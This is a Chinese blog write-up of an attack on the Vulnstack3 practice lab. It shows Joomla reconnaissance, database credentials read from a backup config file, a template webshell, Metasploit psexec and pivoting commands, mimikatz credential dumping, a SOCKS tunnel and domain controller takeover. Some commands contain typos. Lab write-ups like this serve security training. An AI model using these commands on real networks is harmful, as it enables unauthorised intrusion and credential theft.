Vulnstack3渗透记录

环境搭建

下载好后vmware打开,在centos中执行

service network restart

重新获取一下IP即可

网络配置和上次一样,开桥接

外网渗透

出口机器IP为192.168.2.193,先用nmap扫一下端口

 就开了三个端口,瞅瞅80是啥

wappalyzer报了一个joomla,这里找到一个工具joomscan

joomscan -u http://192.168.2.193

拿到了版本信息,后台地址等信息,其中在configuration.php~里找到了数据库账户密码

正好和3306开着的mysql对应,用navicat连接数据库

 读到了奇奇怪怪的密码

 

对着官网的办法把数据库的password改成secret的加密值即可登录

拿到webshell的方法和之前一次打靶的joomla相同,后台改模板即可,冰蝎连接

这里本来想用msf传个马,执行的时候发现有disable_functions,于是写个马用蚁剑连上

然后再尝试上线msf,卡了半天发现不行后才发现问题,ifconfig拿到的ip是93.120,也就是说主机做了反代

看网上wp找到文件里面放着疑似增加用户的命令(自己干找怕是找不到)

判断一下是否本机

cat /etc/group|grep wwwuser

没找到说明不是本机,那就尝试直接连一下开了22端口的2.193

就连上了

传马,监听,加权,执行拿到meterpreter

横向移动

进行内网存活主机发现

route add 192.168.93.0 255.255.255.0 1   #添加路由
use /auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.1-254
run #扫描存活主机

对存活主机进行端口扫描

search portscan
use 5
set rhosts 192.168.93.10,20,30
run

根据开着的一些常见端口

网上说smb存在弱口令..原谅我的字典不到位,硬是跑不出来,就当跑出来了进行下一步利用

use exploit/windows/smb/psexec   
set rhosts 192.168.93.30
set smbuser administrator
set smbpass 123qwe!ASD      #假装爆破成功
set payload windows/x64/meterpreter/bind_tcp   #目标机器反向连不到这边
run

终于拿到一个windows的shell了,本来想派生给cs,后来醒悟了我cs服务端开在服务器上,目标机器还不出网,正向反向都连不上,罢了用msf吧

用msf在30里抓下密码

load mimikatz
kivi_cmd privilege::debug
kivi_cmd sekurlsa::loganPasswords

没抓到想要的域管信息

这里用msf按着一样的方式拿不到20的meterpreter,那就换个办法,先搭个socks隧道然后用wmiexec打

search socks   
use 0
set version 5
set srchost 192.168.2.244
run           #开个socks5

这一步卡了好久才连上😭

在20里面尝试抓一下密码

put /usr/mimikatz.exe #把mimikatz扔上去
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords #抓密码

抓到了好东西,还是明文的

故技重施拿下域控

总结

面对域渗透思路还是很固化,攻击手段单一,还是缺乏积累啊菜啊🐣

 

posted @ 2022-01-08 20:21  Yu_so1dier0n  阅读(220)  评论(0编辑  收藏  举报